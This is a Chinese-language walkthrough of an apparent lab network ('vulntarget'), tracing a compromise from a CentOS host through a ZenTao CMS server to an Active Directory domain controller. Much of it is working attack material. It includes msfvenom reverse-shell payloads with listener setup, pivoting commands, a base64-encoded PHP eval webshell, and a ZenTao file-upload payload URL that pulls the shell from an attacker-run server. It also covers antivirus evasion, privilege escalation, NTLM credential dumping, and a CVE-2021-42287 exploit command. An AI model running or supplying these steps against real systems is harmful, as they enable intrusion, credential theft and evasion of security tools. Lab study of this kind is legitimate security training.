實(shí)際部署之后centos7 的ip有所變動(dòng)分別是 :192.168.127.130以及10.0.20.30

Centos7

老規(guī)矩還是先用fscan掃一下服務(wù)和端口，找漏洞打

直接爆出來一個(gè)SSH弱口令…，上來就不用打了，什么意思？？？
直接xshell登入，生成一個(gè)MSF木馬，然后上線。

上線MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.127.129 LPORT=8888 -f elf > mshell.elf

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 8888
run

添加路由

run post/multi/manage/autoroute

看到另外一個(gè)網(wǎng)段

[!]  * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.127.0/255.255.255.0 from host's routing table.

上傳Fscan

直接使用msf的命令即可上傳

upload /root/home/tools/fscan /tmp/

然后執(zhí)行shell命令，獲取centos的shell，（你可能會(huì)說，都有密碼了，直接連接不行嗎？害，應(yīng)急做多了，老是會(huì)想到，ssh有記錄。)

/usr/bin/script -qc /bin/bash /dev/null   #獲得交互式shell

然后執(zhí)行，執(zhí)行掃描的時(shí)候需要加上-np，因?yàn)?code>win10的那一臺(tái)機(jī)器開著防火墻，ping不通

cd /tmp
chmod +x fscan
./fscan -h 10.0.20.1/24  -np   

執(zhí)行結(jié)果，我把不相關(guān)的直接刪除了，看重點(diǎn)即可。

[root@localhost tmp]# ./fscan -h 10.0.20.1/24 -np___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.3
start infoscan
10.0.20.66:3306 open
10.0.20.66:8080 open
[*] 掃描結(jié)束,耗時(shí): 4m20.058335309s

發(fā)現(xiàn)內(nèi)網(wǎng)有一個(gè)10.0.20.66并且開放了3306和8080端口，先看一下8080端口

WIN10

端口轉(zhuǎn)發(fā)

將本地kali的8181端口轉(zhuǎn)發(fā)給內(nèi)網(wǎng)機(jī)器10.0.20.66的8080端口

portfwd add -l 8282 -p 8080 -r 10.0.20.66

這個(gè)時(shí)候直接訪問kali的8282端口就能訪問到10.0.20.66的8181端口了，主要是將centos給當(dāng)跳板了。
訪問了一下，發(fā)現(xiàn)是禪道CMS

賬號(hào)和密碼是弱口令: admin/Admin#123，看其他博主爆出來的，在后臺(tái)可以看到版本信息，

這個(gè)版本存在一個(gè)漏洞：禪道 12.4.2 后臺(tái)任意文件上傳漏洞 CNVD-C-2020-121325，具體漏洞詳情不多介紹，網(wǎng)上有很多例子。

禪道CMS

在centos中創(chuàng)建一個(gè)php🐎

echo PD9waHAgQGV2YWwoJF9QT1NUWydiJ10pOz8+ | base64 -d >> shell.php

然后用python開啟一個(gè)http服務(wù)，centos內(nèi)置python為python2版本，使用下面命令開啟，確保shell.php在執(zhí)行命令的目錄內(nèi)

python -m SimpleHTTPServer 7777

構(gòu)造參數(shù)

HTTP://10.0.20.30:7777/shell.php
base64加密一下
SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

最終的payload是

http://192.168.127.129:8282/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA=

請求一下這個(gè)url，禪道會(huì)向剛剛開啟的那個(gè)HTTP服務(wù)請求shell.php并且會(huì)保存到data\client\1目錄中，所以🐎的地址為：http://192.168.127.129:8282/data/client/1/shell.php
連接成功，木馬上線

MSF上線

生成一個(gè)反彈shell馬，因?yàn)檎蝰R過不去，關(guān)防火墻也沒權(quán)限

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.20.30 lport=7656 -f exe >7656.exe

使用蟻劍上傳，神奇的一幕出現(xiàn)了，上傳上去立馬就沒了，排查一下進(jìn)程

tasklist 

復(fù)制到進(jìn)程識(shí)別工具中：https://tasklist.pdsec.top/

發(fā)現(xiàn)了火絨程序

免殺

這里直接使用掩日的免殺工具

這個(gè)使用起來特別簡單，直接選擇好MSF生成的🐎，然后點(diǎn)擊生成就會(huì)生成一個(gè)繞過殺毒軟件的木馬
MSF啟動(dòng)監(jiān)聽，注意這個(gè)IP，不要再設(shè)置為kali的IP了

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp   
set lhost 10.0.20.30
set lport 7656
run

然后在蟻劍的終端中運(yùn)行那個(gè)木馬程序，上線（￣︶￣）↗　

再進(jìn)行一個(gè)進(jìn)程遷移

run post/windows/manage/migrate 

添加路由

run post/multi/manage/autoroute

發(fā)現(xiàn)一個(gè)10.0.10.0/255.255.255.0的網(wǎng)段

掃描內(nèi)網(wǎng)

使用arp掃描一下10.0.10.0/255.255.255.0這個(gè)網(wǎng)段的主機(jī)

use post/windows/gather/arp_scanner
set rhosts 10.0.10.1-254
set session 3
run

在這一步發(fā)生了一件比較離譜的事情，每次掃描的時(shí)候，session都會(huì)掉

把火絨關(guān)了也是如此，所以我在想是不是有什么bug，于是我換了一種思路，直接上傳一個(gè)fsca，然后用fscan掃，上傳之前，我把火絨開啟了，奇怪的是，火絨竟然沒有殺掉，可能是規(guī)則庫太老了。
老規(guī)矩還是加上-np參數(shù)

fscan.exe -h 10.0.10.1/24 -np

掃描結(jié)果

10.0.10.100:135 open
10.0.10.100:139 open
10.0.10.100:445 open

發(fā)現(xiàn)了一個(gè)10.0.10.100的主機(jī)，10.0.10.99是當(dāng)前主機(jī)的IP，先進(jìn)行一下主機(jī)信息收集吧

主機(jī)信息收集

通過ipconfig /all可以看到主DNS后綴，基本上可以判定當(dāng)前主機(jī)為域用戶

定位域控
直接使用nslookup解析域名，獲得域控的IP，ip為10.0.10.100

抓取Hash

抓取Hash之前需要先提權(quán)一下，要不然抓不了

提權(quán)

直接使用MSF自帶的功能即可

getsystem

抓取hash

load kiwi 
creds_all

沒有抓取到明文hash

去cmd5里面解析一下NTLM
解密如下

win101 admin#123

域控

CVE-2021-42287

由于Active Directory沒有對域中計(jì)算機(jī)與服務(wù)器賬號(hào)進(jìn)行驗(yàn)證，經(jīng)過身份驗(yàn)證的攻擊者利用該漏洞繞過完全限制，可將域中普通用戶權(quán)限提升為域管理員權(quán)限并執(zhí)行任意代碼
我們在win10中已經(jīng)拿到了域成員的賬號(hào)和密碼:win101/admin#123
POC： https://github.com/WazeHell/sam-the-admin.git

搭建代理

運(yùn)行這個(gè)POC之前需要先搭建一個(gè)代理，要不然訪問不到

use auxiliary/server/socks_proxy
run

然后進(jìn)行漏洞利用

proxychains python3 sam_the_admin.py vulntarget.com/win101:'admin#123' -dc-ip 10.0.10.100 -shell

成功拿到域控的shell

思路

Centos沒啥好說的，弱口令打的，Win10是禪道CMS打進(jìn)去的，然后MSF上線，免殺用的是掩日的工具，添加路由，用CVE-2021-42287打的域控，腳本一把梭，妥妥的腳本小子一個(gè)了。